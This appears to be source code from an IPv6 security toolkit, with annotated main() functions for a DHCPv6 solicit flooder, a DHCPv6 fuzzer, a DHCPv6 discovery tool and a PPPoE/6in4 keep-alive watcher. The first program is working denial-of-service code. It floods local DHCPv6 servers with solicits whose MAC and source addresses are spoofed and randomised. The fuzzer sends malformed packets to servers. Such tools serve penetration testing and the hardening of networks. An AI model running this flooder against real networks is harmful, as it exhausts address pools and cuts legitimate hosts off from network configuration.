/*
 * Entry point of the DHCPv6 solicit sender.
 *
 * Builds one UDP payload from the file-scope `solicit` template (optionally
 * extended with the `dnsupdate1`/`dnsupdate2` option bytes and a caller-
 * supplied domain name), then loops forever sending it from UDP 546 to 547
 * on `interface`, re-randomising a few payload bytes and the embedded MAC on
 * every iteration. Replies are drained through the check_packets() callback.
 *
 * argv: [-d name] [-n|-N] [-1] [-r] interface [destination]
 *   -d  enable the DNS-update option with `name` as the domain
 *   -N  use the interface's real link-local address (implies -n)
 *   -n  use the interface's real MAC
 *   -1  skip the receive/drain step after each send
 *   -r  accepted and ignored
 *
 * `do_dns`, `dns_name` and `interface` are file-scope variables set here;
 * they are not declared in this function.
 *
 * Returns -1 if packet construction fails; on success the loop never
 * returns (the process ends on SIGINT or exit()).
 */
int main(int argc, char *argv[]) {
  // `mac` is a plain char array but is also reached through the unsigned
  // `mac6` pointer below; the initialiser is overwritten by memset() later.
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
  char wdatabuf[1024];                  // assembled UDP payload
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, pkt_len = 0, dlen = 0; // dlen: offset of the variable domain bytes
  unsigned long long int count = 0;     // per-iteration counter, also fed into the payload
  pcap_t *p = NULL;
  int do_all = 1, use_real_mac = 0, use_real_link = 0;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);
  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
    switch (i) {
    case 'N':
      use_real_link = 1;
      // no break
    case 'n':
      use_real_mac = 1;
      break;
    case '1':
      do_all = 0;
      break;
    case 'd':
      do_dns = 1;
      dns_name = optarg;
      break;
    case 'r':
      i = 0;
      break; // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  // Discards the {0, 0x0c, ...} initialiser: the MAC is either taken from the
  // interface (-n) or randomised per iteration below.
  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  // NOTE(review): dst is never NULL-checked; a destination that
  // thc_resolve6() cannot resolve reaches thc_create_ipv6_extended() as NULL.
  if (argc - optind <= 1)
    dst = thc_resolve6("ff02::1:2");
  else
    dst = thc_resolve6(argv[optind + 1]);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  if (src == NULL || mac6 == NULL) {
    fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
    exit(-1);
  }
  // only to prevent our system to send icmp port unreachable messages
  // (the socket `s` is kept open for the lifetime of the process and is
  // otherwise unused)
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }

  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  if (do_dns) {
    memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
    dlen = len + 8; // first byte after the 8-byte fixed part of dnsupdate1
    len += sizeof(dnsupdate1);
    // The 240-byte cap keeps solicit + dnsupdate1 + name + dnsupdate2 inside
    // wdatabuf[1024]; sizes of the templates are not visible here.
    if (dns_name != NULL && strlen(dns_name) < 240) {
      if (dns_name[0] != '.') {
        // Prepend a label separator and bump the two length bytes
        // (presumably option length / name length — confirm against dnsupdate1).
        wdatabuf[len] = '.';
        wdatabuf[dlen - 5]++;
        wdatabuf[dlen - 3]++;
        len++;
      }
      memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); // includes the NUL
      wdatabuf[dlen - 5] += strlen(dns_name) + 1;
      wdatabuf[dlen - 3] += strlen(dns_name) + 1;
      len += strlen(dns_name) + 1;
    }
    memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
    len += sizeof(dnsupdate2);
  }

  printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);

  while (1) {
    count++;
    // Overwrite the lower 8 bytes of the link-local source with the counter
    // (assumes src points at a 16-byte address — as returned by thc_resolve6()).
    if (!use_real_link)
      memcpy(src + 8, (char *) &count, 8);
    // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
    for (i = 0; i < 3; i++) {
      wdatabuf[i + 32] = rand() % 256;
      wdatabuf[i + 18] = rand() % 256;
      mac[i + 2] = rand() % 256;       // only bytes 2..4 of the MAC vary
      if (do_dns)
        wdatabuf[i + dlen] = 'a' + rand() % 26; // first 3 domain chars
    }
    if (!use_real_mac)
      memcpy(wdatabuf + 22, mac, 6);
    // Bytes 1..3 of the payload carry 3 bytes of `count`; `_TAKE3` is a
    // file-scope offset, presumably selecting the low-order bytes — confirm.
    memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
      return -1;
    // we have to tone it down, otherwise we will not get advertisements
    if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
      printf("!");
    pkt = thc_destroy_packet(pkt);
    if (do_all) {
      usleep(75);
      // Drain everything currently captured; check_packets() is the handler.
      while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
    }
    if (count % 1000 == 0)
      printf(".");
  }
  return 0; // never reached
}
/*
 * Entry point of the DHCPv6 fuzzer.
 *
 * Assembles a DHCPv6 payload from the `solicit` template (plus the DNS-update
 * option when -d is given), builds a fuzz mask string in the file-scope
 * `fuzzbuf` from the `fuzztype_*` fragments, and then either
 *   - STATELESS (Solicit / Rebind): hands the finished packet to fuzz_loop(), or
 *   - STATEFULL (all other types): sends the packet once, then waits up to
 *     `timeout` seconds for an advertisement which the
 *     construct_from_adv_and_fuzz() callback uses to build the real test cases.
 *
 * argv: [-1..8] [-m] [-n count] [-t start] [-e end] [-T n] [-d] [-F|-f] [-p n] [-r]
 *       interface [domain]
 * Note that '9' is in the getopt string but has no case label, so -9 is
 * reported as an unknown option.
 *
 * `p`, `do_type`, `fuzz_msg_type`, `no_send`, `test_start`, `test_end`,
 * `ping`, `do_dns`, `dns_name`, `interface`, `fuzzbuf`, `dns_option_hdr`,
 * `dns_option_hdr_len`, `got_packet` and `timeout` are file-scope variables
 * used here without a local declaration.
 *
 * Returns -1 on packet construction / send failure, 0 otherwise.
 */
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; // 6-byte MAC scratch buffer; pkt is the packet under construction
  char wdatabuf[1024];                                 // 1024-byte UDP payload buffer
  unsigned char *mac6 = mac, *src, *dst;               // mac6 aliases `mac` unless -f is off and the real MAC is fetched
  int i, s, len, pkt_len = 0, dlen = 0;
  int do_all = 1, use_real_mac = 1, use_real_link = 1; // do_all is never read in this function
  int state;                                           // STATELESS or STATEFULL, derived from do_type

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);
  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  //Parse options
  // NOTE(review): numeric options go through atoi(), so non-numeric input
  // silently becomes 0 (caught below only for -n).
  while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) {
    switch (i) {
    case '1': do_type = DO_SOL; break;
    case '2': do_type = DO_REQ; break;
    case '3': do_type = DO_CON; break;
    case '4': do_type = DO_REN; break;
    case '5': do_type = DO_REB; break;
    case '6': do_type = DO_REL; break;
    case '7': do_type = DO_DEC; break;
    case '8': do_type = DO_INF; break;
    case 'm': fuzz_msg_type = 1; break;
    case 'n': no_send = atoi(optarg); break;
    case 't': test_start = atoi(optarg); break;
    case 'e': test_end = atoi(optarg); break;
    case 'T': test_end = test_start = atoi(optarg); break;
    case 'F': use_real_link = 0; // no break
    case 'f': use_real_mac = 0; break;
    case 'p': ping = atoi(optarg); break;
    case 'd': do_dns = 1; break;
    case 'r': i = 0; break; // just to ignore -r
    default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1);
    }
  }

  //Check options
  if (no_send < 1) {
    fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
    exit(-1);
  }
  if (test_end < test_start) {
    printf("don't f**k up the command line options!\n");
    exit(-1);
  }

  memset(mac, 0, sizeof(mac)); // drop the initialiser; filled from the interface or rand() below
  interface = argv[optind];
  dns_name = argv[optind + 1]; // may be NULL when no domain is given; checked before use
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  // NOTE(review): unlike the sibling tools, neither src nor mac6 is
  // NULL-checked here; a bad interface name makes the memcpy() below
  // dereference NULL.
  if (use_real_mac) {
    mac6 = thc_get_own_mac(interface);
    memcpy(mac, mac6, sizeof(mac));
  }
  dst = thc_resolve6("ff02::1:2");
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  // only to prevent our system to send icmp port unreachable messages
  // (`s` is otherwise unused)
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }

  //Establish state
  if (do_type == DO_SOL || do_type == DO_REB)
    state = STATELESS;
  else
    state = STATEFULL;

  // generate full fuzz mask for stateless types and partial for statefull types
  // NOTE(review): fuzzbuf is filled with unbounded strcpy()/strcat(); its
  // capacity is not visible here — confirm it covers every fragment plus up
  // to 7 + 240 appended 'B's.
  strcpy(fuzzbuf, fuzztype_ether);
  strcat(fuzzbuf, fuzztype_ip6);
  strcat(fuzzbuf, fuzztype_udp);
  if (fuzz_msg_type)
    strcat(fuzzbuf, fuzztype_dhcp6);
  else
    strcat(fuzzbuf, fuzztype_dhcp6no);
  if (state == STATELESS) {
    strcat(fuzzbuf, fuzztype_elapsed_time);
    strcat(fuzzbuf, fuzztype_client_identifier);
    strcat(fuzzbuf, fuzztype_IA_NA);
    if (do_dns)
      strcat(fuzzbuf, fuzztype_FQDN);
  }

  /** Generate packet **/
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);

  //Add dns option
  // The option bytes are written twice: into the payload (wdatabuf) and into
  // the file-scope dns_option_hdr, which the stateful path presumably reuses.
  if (do_dns) {
    memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
    memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1));
    dlen = len + 8; // first byte after the 8-byte fixed part of dnsupdate1
    len += sizeof(dnsupdate1);
    dns_option_hdr_len += sizeof(dnsupdate1);
    //Append domain string prefix fuzz mask
    if (state == STATELESS) { //<-- Do fuzzbuffer later
      for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix
        strcat(fuzzbuf, "B");
    }
    if (dns_name != NULL && strlen(dns_name) < 240) {
      if (dns_name[0] != '.') {
        // Prepend a label separator and bump the two length bytes
        // (presumably option length / name length — confirm against dnsupdate1).
        wdatabuf[len] = '.';
        wdatabuf[dlen - 5]++;
        wdatabuf[dlen - 3]++;
        len++;
      }
      memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); // includes the NUL
      memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1);
      wdatabuf[dlen - 5] += strlen(dns_name) + 1;
      wdatabuf[dlen - 3] += strlen(dns_name) + 1;
      len += strlen(dns_name) + 1;
      dns_option_hdr_len += strlen(dns_name) + 1;
      //Append variable length domain string suffix fuzz mask
      if (state == STATELESS) {
        for (i = 0; i < strlen(dns_name) + 1; ++i)
          strcat(fuzzbuf, "B");
      }
    }
    memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
    memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2));
    len += sizeof(dnsupdate2);
    dns_option_hdr_len += sizeof(dnsupdate2);
    //Append option request (FQDN request) fuzz mask
    if (state == STATELESS){
      strcat(fuzzbuf, fuzztype_option_request);
    }
  }

  //Set message type (byte 0 of the payload) for the stateless types only
  if (state == STATELESS) {
    switch (do_type) {
    case DO_SOL: wdatabuf[0] = 0x01; break;
    case DO_REB: wdatabuf[0] = 0x06; break;
    default: break;
    }
  }

  // Randomise bytes 8..15 of the link-local source address (the interface
  // identifier half), not the MAC; assumes src points at a 16-byte address.
  if (!use_real_link)
    for (i = 0; i < 8; i++)
      src[i + 8] = rand() % 256;
  // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 1] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    wdatabuf[i + 32] = rand() % 256;
    if (!use_real_mac) {
      mac[i * 2] = rand() % 256; // all 6 MAC bytes randomised, two per pass
      mac[i * 2 + 1] = rand() % 256;
    }
    if (do_dns)
      wdatabuf[i + dlen] = 'a' + rand() % 26; // first 3 domain chars
  }
  memcpy(wdatabuf + 22, mac, 6);
  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
    return -1;
  // Generate only; sending is done by fuzz_loop() or explicitly below.
  // NOTE(review): the early returns above and below leak `pkt`; harmless at
  // process exit but worth a thc_destroy_packet() if this is ever refactored.
  if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    return -1;

  //Fuzz solicit packet
  if (state == STATELESS) {
    if (fuzz_loop(pkt, &pkt_len) < 0)
      return -1;
  }
  //Fuzz request, confirm or renew paket
  else if (state == STATEFULL) {
    //Send a dhcp solicit to discover dhcpv6 servers
    if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
      fprintf(stderr, "Error: Failed to send initial solicit packet\n");
      return -1;
    }
    usleep(75); //<-- I don't really know why this is neccessary but it seems to be
    //Construct and fuzz packets using server identifier
    got_packet = 0;
    time_t start_time = time(NULL);
    // Poll the capture until the callback reports an advertisement or
    // `timeout` seconds elapse (busy loop: no sleep between passes).
    while(time(NULL) - start_time < timeout) {
      while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0);
      //got_packet set in callback function
      if (got_packet)
        break;
    }
    if (!got_packet)
      fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n");
  }
  pkt = thc_destroy_packet(pkt);
  // printf("fuzzbuf: %s\n", fuzzbuf);
  return 0;
}
/*
 * Entry point of the DHCPv6 discovery tool.
 *
 * Sends exactly one Solicit (from the `solicit` template) and one
 * Information Request (from the `inforeq` template) to ff02::1:2 on
 * UDP 546->547, then drains replies through check_packets() until a 3-second
 * alarm fires and clean_exit() terminates the process.
 *
 * argv: [-n|-N] [-1] [-r] interface [name]
 *   -N / -n  select the real link-local address / real MAC — but both flags
 *            already default to 1 here, so they change nothing
 *   -1       sets do_all, which this function never reads
 *   -r       accepted and ignored
 *   'd' is in the getopt string but has no case label, so -d is rejected
 *   as an unknown option.
 *
 * `interface` and `dns_name` are file-scope variables assigned here;
 * dns_name is not used in this function.
 *
 * Returns -1 if packet construction fails; otherwise never returns normally.
 */
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
  char wdatabuf[1024], wdatabuf2[1024]; // Solicit payload / Information Request payload
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
  unsigned long long int count = 0;     // stays 0: only used to stamp bytes 1..3 / source IID
  pcap_t *p = NULL;
  int do_all = 1, use_real_mac = 1, use_real_link = 1;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);
  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
    switch (i) {
    case 'N': use_real_link = 1; // no break
    case 'n': use_real_mac = 1; break;
    case '1': do_all = 0; break;
    case 'r': i = 0; break; // just to ignore -r
    default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1);
    }
  }

  memset(mac, 0, sizeof(mac)); // drop the initialiser; bytes 2..4 are randomised below
  interface = argv[optind];
  if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  dns_name = argv[optind + 1];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  // NOTE(review): mac6 is not NULL-checked after this call (only the own
  // IPv6 lookup above is); a NULL mac6 reaches thc_generate_and_send_pkt().
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  dst = thc_resolve6("ff02::1:2");
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  // only to prevent our system to send icmp port unreachable messages
  // (`s` is otherwise unused)
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  len2 = sizeof(inforeq);
  memcpy(wdatabuf2, inforeq, len2);
  printf("Sending DHCPv6 Solicitate message ...\n");
  printf("Sending DHCPv6 Information Request message ...\n");
  // Only reachable when -N was not given — but use_real_link defaults to 1
  // and no option clears it, so this branch is dead as written.
  if (!use_real_link)
    memcpy(src + 8, (char *) &count, 8);
  // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 32] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    mac[i + 2] = rand() % 256;
  }
  // Likewise dead: use_real_mac is never cleared, so the template MAC bytes
  // are left untouched and the real MAC comes from mac6 at send time.
  if (!use_real_mac)
    memcpy(wdatabuf + 22, mac, 6);
  if (!use_real_mac)
    memcpy(wdatabuf2 + 18, mac, 6);
  // Bytes 1..3 of each payload receive 3 bytes of `count` (always 0 here);
  // `_TAKE3` is a file-scope offset, presumably picking the low-order bytes.
  memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
  memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);
  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    printf("!");
  if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
    printf("!");
  // Process lifetime is bounded by the alarm: clean_exit() runs after 3 s.
  signal(SIGALRM, clean_exit);
  alarm(3);
  // i = thc_send_pkt(interface, pkt, &pkt_len);
  // pkt2 is never destroyed; it is reclaimed when the process exits.
  pkt = thc_destroy_packet(pkt);
  while (1) {
    usleep(75);
    while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
  }
  return 0; // never reached
}
/*
 * Entry point of the PPPoE / 6in4 keep-alive watcher.
 *
 * Selects the tunnel type from the THC_IPV6_PPPOE / THC_IPV6_6IN4
 * environment variables, then either
 *   - active mode (-a, PPPoE only): sends a fixed 12-byte keep-alive
 *     payload every 15 seconds while passing captured frames to intercept(), or
 *   - otherwise: hands the interface to thc_pcap_function() with intercept()
 *     as the callback and never expects it to return.
 *
 * argv: [-a] [-d] [-p] interface
 *   -a  active mode   (file-scope `active`)
 *   -d  debug output  (file-scope `debug`)
 *   -p  passive mode  (file-scope `passive`; not read in this function)
 *
 * `type` and `interface` are file-scope variables set here.
 *
 * Returns -1 if a send fails; in every other case the loops never return.
 */
int main(int argc, char *argv[]) {
  // `data` is the keep-alive payload; the 0xc0 0x21 bytes written below look
  // like a PPP LCP protocol id and 0x09 like an LCP Echo-Request code — verify
  // against the PPP spec before relying on that reading.
  char sndbuf[128], data[] = { 0x09, 0x0a, 0x00, 0x0c, 0xfa, 0xce, 0xba, 0xbe, 0x1f, 0x1e, 0x1d, 0x1c };
  time_t passed = 0;   // next send time; 0 forces an immediate first send
  pcap_t *p;
  thc_ipv6_hdr hdr;    // wraps sndbuf so it can be passed to thc_send_pkt()
  int sndbuflen = 0, i;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);
  while ((i = getopt(argc, argv, "adp")) >= 0) {
    switch(i) {
    case 'a': active = 1; break;
    case 'd': debug = 1; break;
    case 'p': passive = 1; break;
    default: fprintf(stderr, "Error: invalid option -%c\n", i); exit(-1);
    }
  }
  if (getenv("THC_IPV6_PPPOE") != NULL)
    type = 1;
  else if (getenv("THC_IPV6_6IN4") != NULL)
    type = 2;
  if (type == 0) {
    fprintf(stderr, "Error: neither the THC_IPV6_PPPOE nor THC_IPV6_6IN4 environment variable is set\n");
    exit(-1);
  }
  // Only a message: execution continues and, because the active branch below
  // requires type == 1, falls through to the passive path.
  if (type == 2 && active)
    fprintf(stderr, "Error: active ping6 sending in for THC_IPV6_6IN4 is not possible. Please use thcping6 or alive6 to perform the active alive packet sending.\n");
  interface = argv[optind];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  printf("Started %s keep-alive watcher on %s (Press Control-C to end) ...\n", type == 1 ? "PPPoE" : "6in4", argv[optind]);
  if (active == 1 && type == 1) {
    if ((p = thc_pcap_init_promisc(interface, "it does not matter what we put here")) == NULL) {
      fprintf(stderr, "Error: Could not set interface into promiscious mode\n");
      exit(-1);
    }
    // Frame = file-scope header template (do_hdr, do_hdr_size bytes) followed
    // by `data`. NOTE(review): sndbuf holds 128 bytes and do_hdr_size is not
    // visible here — confirm do_hdr_size + sizeof(data) <= 128 and
    // 21 + do_hdr_off < do_hdr_size.
    memcpy(sndbuf, do_hdr, do_hdr_size);
    sndbuf[18 + do_hdr_off] = 0x00;
    sndbuf[19 + do_hdr_off] = sizeof(data) + 2; // presumably a length field covering data + 2 bytes
    sndbuf[20 + do_hdr_off] = 0xc0;
    sndbuf[21 + do_hdr_off] = 0x21;
    memcpy(sndbuf + do_hdr_size, data, sizeof(data));
    sndbuflen = do_hdr_size + sizeof(data);
    hdr.pkt = sndbuf;
    hdr.pkt_len = sndbuflen;
    while (1) {
      thc_pcap_check(p, (char *) intercept, NULL);
      usleep(100);
      // Resend once the 15-second deadline has passed.
      if (passed <= time(NULL)) {
        if (thc_send_pkt(interface, (unsigned char*) &hdr, &sndbuflen) < 0) {
          fprintf(stderr, "Error: could not send packet to interface %s\n", interface);
          return -1;
        }
        passed = time(NULL) + 15;
      }
    }
  } else {
    // thc_pcap_function() is expected to block for the life of the process;
    // reaching the lines after it means the capture could not be started.
    thc_pcap_function(interface, "it does not matter what we put here", (char *) intercept, 1, NULL);
    fprintf(stderr, "Error: Could not set interface into promiscious mode\n");
    exit(-1);
  }
  return -1; // never reached unless error
}